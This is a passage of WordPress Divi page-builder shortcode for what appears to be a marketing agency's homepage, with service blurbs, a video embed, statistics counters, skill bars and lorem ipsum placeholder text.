border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" 